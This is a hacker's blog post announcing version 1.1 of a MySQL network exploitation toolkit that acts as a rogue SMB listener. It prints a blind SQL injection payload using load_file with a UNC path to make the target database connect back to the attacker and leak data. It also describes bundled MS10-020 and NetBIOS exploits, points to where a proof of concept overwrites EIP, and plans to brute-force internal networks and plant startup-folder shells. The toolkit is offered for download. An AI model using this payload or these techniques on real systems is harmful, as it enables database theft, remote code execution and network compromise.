MySQL network exploitation toolkit 1.1
After some more work I am proud to announce that I will release version 1.1 of the MySQL network exploitation toolkit, for the people who don't follow us that much; this is a tool with which you can make your computer listen over port 445 and your computer will act as a SMB server.
So you might wonder how this can be of any use but with this you can entirely remove the blind MySQL injection problem; by letting a computer connect to you and adding some information in the query.
Here is a picture i just made to explain it for the people who missed the previous posts:
In this picture I tried to simulate the following MySQL injection:
index.php?id=1 AND load_file(concat('\\\\you\\', information()))
Which would cause the MySQL server to connect back to you over the SMB protocol and try to get the file named to the output of the information() function; as you can see it requires minimal.
Alright, I think you got an idea of how it works, now the second tricky part kicks in and that is that we can attack the client side SMB client; when the MySQL server connects to you it will use the default SMB client, by proper exploitation of the SMB client you get remote code execution and with some luck you will get kernel level access this way.
I included 2 exploits MS10-020 and a lame DoS in the netbios protocol.
I did not yet release the actual trick on how to exploit the client side SMB client with MS10-020 because it would give major problems on the internet and lot's of servers will get compromised.
I think it's better if I keep this trick for something longer, I was scheduled to talk about this tool on Hack in the Box (HitB) at the Krasnapolsky in Amsterdam but the speaker before me was talking through my time about router security and unfortunately Saumil Shah did a very interesting talk after that in another room which no one wanted to miss (me neither because it was brilliant! 
).
Anyhow, if you have experience with exploiting buffer overflows it is a piece of cake to turn this in remote code execution and in the file smb2.py on line 194 there is the PoC which Laurent Gaffié released back in April, I even pointed where the EIP and EBP get overwritten; if you first spam the buffer with some packets, analyze where the buffer gets filled and let the eip jump to that place you have a chance it will get reliable enough to trigger the remote code execution, for now it's just a DoS (blue screen of death) which can proof that the server is vulnerable.
Then there still is a third trick where I will be working on in the next versions of this tool and that is brute forcing the internal network and put things in the startup folder so when the machines will restart the machine will connect to you with a fresh shell.
Here is a picture I just made to explain it to you:
This release is having more capability to talk with SMB clients the proper way and it is to provide more stability.
I also made the code more organized and the way you will get the results is a lot cleaner in this version.
Have fun with it!
You can download version 1.1 in the download section here.
6 Comments
-
-
Johan Edholm says:
Try this:
http://www.networknotepad.com/
-
-
-
-
Hello, I am Jelmer, born in 1991, I have been playing in IT security for over half my age, I am not sure when how and why it started but I like it. I met Fredrik and Mathias through the internet. This is my Twitter account, feel free to follow me. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com Or you can chat with me in the IRC.